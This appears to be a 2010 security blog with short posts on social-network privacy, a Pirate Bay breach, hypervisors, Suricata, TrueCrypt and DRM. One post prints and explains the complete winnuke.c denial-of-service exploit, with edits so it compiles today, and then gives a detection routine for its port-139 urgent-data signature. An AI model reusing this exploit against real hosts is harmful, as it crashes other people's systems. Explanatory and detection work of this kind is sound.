Irregular Expressions


July 9, 2010  8:19 AM

Do you really know your friends?



Posted by: Dan O'Connor
facebook security, linkedin security, privacy, robin sage

I have thought about this for many years with Facebook and LinkedIn.  How many of the people on your friend list have you actually checked to see that they are who they say they are?

How many are old friends that you just added but never really had a conversation with, or had one that covered nothing but common knowledge?

It does not take a whole lot of information to get your email password reset.  With the basic information from a Facebook profile, an attacker can start to collect the details needed to gain access to email accounts.

Anything posted on the internet should be treated as public: you might as well write it on a billboard.

So someone tried the same thing with members of the DOD and other arms of the US government. I don’t want to spoil this one, so head over and check it out.

http://www.darkreading.com/insiderthreat/security/privacy/showArticle.jhtml?articleID=225702468

July 8, 2010  11:50 AM

thepiratebay.org



Posted by: Dan O'Connor
SQL injection, thepiratebay.org

There appear to have been more than a few SQL injection vulnerabilities on thepiratebay.org:

http://krebsonsecurity.com/2010/07/pirate-bay-hack-exposes-user-booty/

The group responsible says that none of the information gained was sold or disseminated.  Still, if you had an account there, I would change your password, and I hope that you have not been doing something that you should not have been.


July 5, 2010  1:12 PM

Xen vs VMWare



Posted by: Dan O'Connor
vmware, vmware performance, xen, xen performance, xen vs vmware

This is a little older than I would like, but I have not been able to find anything else like this document.

www.vmware.com/pdf/hypervisor_performance.pdf

This is a Xen head-to-head with ESX 3.0.1; it compares performance in compiling and gzip, to name a few of the workloads.

Very interesting, even if it is a little old.


July 2, 2010  12:39 PM

Suricata 1.0 release



Posted by: Dan O'Connor
ids, ids/ips, ips, suricata

Version 1.0 of the Suricata IDS/IPS has been released; you can get it here.

http://www.openinfosecfoundation.org/index.php/download-suricata


June 30, 2010  11:56 AM

An ounce of prevention



Posted by: Dan O'Connor
truecrypt

It always pays to encrypt your disk.

http://www.theregister.co.uk/2010/06/28/brazil_banker_crypto_lock_out/

I don’t know if I would call him a smart criminal, but at least it sounds like he outsmarted the authorities and the FBI.

By the way, he is using TrueCrypt, one of my favorites; it can be found at truecrypt.org.


June 30, 2010  12:05 AM

winnuke.c



Posted by: Dan O'Connor
exploit, winnuke.c

OK, here is the code that was at the link I posted previously (it is posted at the bottom of this post).

I am pretty sure this is the right code: line 1 has the author, _eci. Wikipedia has an article on it, and it lists the same person as the poster of the code.

I am still not an expert in C, but I can read the code and point out things of interest as we go and see if I can explain them a bit.

Lines 5-11 are includes that pull in the headers the program needs. The ones of note are 8 and 10, netinet/in.h and sys/socket.h, which provide the socket address structures and the socket calls.

Line 13 defines the destination port, 139 in this case.

Lines 15-18 declare the variables and structures.

Line 21 is the start of a function called open_sock that makes the outbound connection. (If you are really interested in creating sockets, there are great examples to be found on Google.)

On line 59 you can see the call to that function with its arguments: open_sock(<the socket>, <the target>, <the destination port>).

Line 62 is the attack: send(<the socket>, <the message to send>, <the length of the message>, <additional flags>). The payload is “Bye”, but the message is irrelevant. The important part is the additional flag, MSG_OOB. MSG_OOB tells the stack to send the data as TCP out-of-band (urgent) data, which sets the URG flag in the TCP header, and that urgent segment arriving on port 139 is exactly what causes the system to blue screen.

Ta Da!

(It was here if you did not get it: neil.franklin.ch/Info_Texts/winnuke.c)

1 /* winnuke.c - (05/07/97)  By _eci  */
2 /* Tested on Linux 2.0.30, SunOS 5.5.1, and BSDI 2.1 */
3 #include <stdlib.h>      /* added so it builds today: exit() */
4 #include <arpa/inet.h>   /* added so it builds today: inet_addr(), INADDR_NONE */
5 #include <stdio.h>
6 #include <string.h>
7 #include <netdb.h>
8 #include <netinet/in.h>
9 #include <sys/types.h>
10 #include <sys/socket.h>
11 #include <unistd.h>
12 #include <strings.h>     /* added so it builds today: bzero(), bcopy() */
13 #define dport 139  /* Attack port: 139 is what we want */
14
15 int x, s;
16 char *str = "Bye";  /* Makes no diff */
17 struct sockaddr_in addr, spoofedaddr;
18 struct hostent *host;
19
20
21 int open_sock(int sock, char *server, int port) {
22     struct sockaddr_in blah;
23     struct hostent *he;
24     bzero((char *)&blah,sizeof(blah));
25     blah.sin_family=AF_INET;
26     blah.sin_addr.s_addr=inet_addr(server);
27     blah.sin_port=htons(port);
28
29    if ((he = gethostbyname(server)) != NULL) {   /* first try to resolve it as a hostname */
30       bcopy(he->h_addr, (char *)&blah.sin_addr, he->h_length);
31    }
32    else {                                        /* otherwise treat it as a dotted quad */
33         if ((blah.sin_addr.s_addr = inet_addr(server)) == INADDR_NONE) {  /* was "< 0": inet_addr() is unsigned, so that never fired */
34           perror("gethostbyname()");
35           return(-3);
36         }
37    }
38
39        if (connect(sock,(struct sockaddr *)&blah,sizeof(blah))==-1) {
40             perror("connect()");
41             close(sock);
42             return(-4);
43        }
44        printf("Connected to [%s:%d].\n",server,port);
45        return 0;                                  /* was a bare "return;" in an int function */
46 }

47 int main(int argc, char *argv[]) {                 /* was "void main" */
48
49     if (argc != 2) {
50       printf("Usage: %s <target>\n",argv[0]);
51       exit(0);
52     }
53
54     if ((s = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) == -1) {
55        perror("socket()");
56        exit(-1);
57     }
58
59     if (open_sock(s,argv[1],dport) < 0) exit(-1);  /* original ignored the return value and sent anyway */
60
61     printf("Sending crash... ");
62       send(s,str,strlen(str),MSG_OOB);              /* MSG_OOB: payload goes out as TCP urgent data */
63       usleep(100000);
64     printf("Done!\n");
65     close(s);
66 }
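Since the MSG_OOB on line 62 puts the payload on the wire as TCP urgent data with the URG flag set, the attack has a simple signature that an IDS such as the Suricata release mentioned above can match on. The following is an added example of that check, not code from the original post or from winnuke.c; the function name and the sample TCP headers are my own constructions.

```c
/* Added detection example (not part of the original post or winnuke.c):
 * inspect a raw TCP header and flag the WinNuke signature, a segment to
 * NetBIOS port 139 carrying urgent data (URG flag set, non-zero urgent
 * pointer), which is what send(..., MSG_OOB) produces on the wire. */
#include <stdint.h>
#include <stddef.h>
#include <stdio.h>

#define TCP_URG 0x20          /* URG bit in the TCP flags byte (offset 13) */
#define NETBIOS_SSN_PORT 139  /* port the original exploit targets */

/* Returns 1 if the TCP header in seg matches the signature, 0 if it is
 * ordinary traffic, -1 if len is too short to hold a 20-byte TCP header. */
int is_winnuke_segment(const uint8_t *seg, size_t len) {
    if (len < 20) return -1;
    uint16_t dport  = (uint16_t)((seg[2] << 8) | seg[3]);    /* destination port */
    uint8_t  flags  = seg[13];                               /* control bits */
    uint16_t urgptr = (uint16_t)((seg[18] << 8) | seg[19]);  /* urgent pointer */
    return (dport == NETBIOS_SSN_PORT && (flags & TCP_URG) && urgptr != 0) ? 1 : 0;
}

/* Constructed sample: 40000 -> 139, flags URG|PSH|ACK, urgent pointer 3
 * (a made-up value, placed past the 3-byte "Bye" payload). */
static const uint8_t sample_oob[20] = {
    0x9c, 0x40,              /* src port 40000 */
    0x00, 0x8b,              /* dst port 139 */
    0x00, 0x00, 0x00, 0x01,  /* sequence number */
    0x00, 0x00, 0x00, 0x01,  /* acknowledgement number */
    0x50,                    /* data offset 5 words = 20 bytes */
    0x38,                    /* flags: URG (0x20) | ACK (0x10) | PSH (0x08) */
    0xff, 0xff,              /* window */
    0x00, 0x00,              /* checksum (not verified here) */
    0x00, 0x03               /* urgent pointer */
};

/* Constructed sample: same session, URG cleared and urgent pointer zero. */
static const uint8_t sample_normal[20] = {
    0x9c, 0x40, 0x00, 0x8b, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x01,
    0x50, 0x18, 0xff, 0xff, 0x00, 0x00, 0x00, 0x00
};

int main(void) {
    printf("oob segment flagged:    %d\n", is_winnuke_segment(sample_oob, sizeof sample_oob));
    printf("normal segment flagged: %d\n", is_winnuke_segment(sample_normal, sizeof sample_normal));
    return 0;
}
```

The same three conditions (destination port 139, URG flag, non-zero urgent pointer) are what an IDS rule for this attack keys on; a real sensor would first strip the IP header and check the data offset before reading the TCP fields.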


June 29, 2010  11:26 PM

A little more history



Posted by: Dan O'Connor
winnuke, winnuke 97, winnuke.c

Do you remember your first WinNuke?

I sure do, in 1997 when the code for WinNuke was floating around a Netscape and very blinky and animated gif Internet.  At the time I was spending way too much time playing Tie Fighter and War Craft I or II, but I did find some spare time to mess with the WinNuke code.

I wish I had kept the code for the one that I was messing with; I remember the setup being able to take a whole subnet and not just individual hosts. Times were good and exploit code was simple!

I did find a link to what looks like the original code.

neil.franklin.ch/Info_Texts/winnuke.c

I think this is a great example to do a walk-through; take a look at the posted code. Part 2 is going to have a detailed step through.

Nothing like watching a whole lab of computers all going blue :)


June 29, 2010  11:04 PM

A little history



Posted by: Dan O'Connor
Hacker Manifesto

I was checking some of my favorite places to get new exploits for Metasploit and I stumbled on a posting of the Hacker Manifesto!

That sure makes me think. I tend to forget what life was like even before I had a modem and we had to move data around using our sneaker net.  That’s when I found out that putting floppies in your pocket when it's -40C outside does not really do much for you if you ever want to get that data back off!

It gets me all nostalgic thinking about the first BBSs I started to use, and the games that were on there.  Man, do I miss dialing up and playing LORD at 11:45 and then sitting on the line until 12 so I could get a second turn.

http://en.wikipedia.org/wiki/Hacker_Manifesto


June 27, 2010  10:36 PM

Building a better DRM



Posted by: Dan O'Connor
drm, pki, software protection

Implementing DRM or software protection can be a very challenging task.  The overall goal is to protect the item in question: you want to stop it from being copied and/or redistributed to individuals or entities that should not have access to it.

Or is it?

When you really start to think about what you are doing in a DRM setup, it starts, in my opinion, to look like another problem that we have solved already.  To me DRM looks like something that can be done very well with a PKI system.

Users could be given a certificate tied to a unique account that allows them access to the system; this can also have a username and password or a fob to go along with it.  Of course this also requires that the device or software in question be allowed to phone home and check in, but when you start to think about it, that can be solved too.

Just a thought that I have been bouncing around for a while.


June 26, 2010  9:58 PM

French hacker given suspended sentence for Twitter hacking



Posted by: Dan O'Connor
obama twitter hack, twitter hack

The French hacker who compromised Obama’s Twitter account, amongst others, has only been given a 5 month suspended sentence.  While what he accessed and did with the access was not serious, I think the reasoning that was given is a load of bollocks.  Also, what he could have done with the access could have really messed something up.  If he had sent messages as Obama, given the current economic situation it could have triggered problems with the stock market and caused a real problem.

I really wish there was more done to people that do this; it starts to set a really bad trend when they are handed such light sentences.

The full story is on Yahoo News below.

http://news.yahoo.com/s/ap/20100625/ap_on_hi_te/eu_france_twitter_hacker

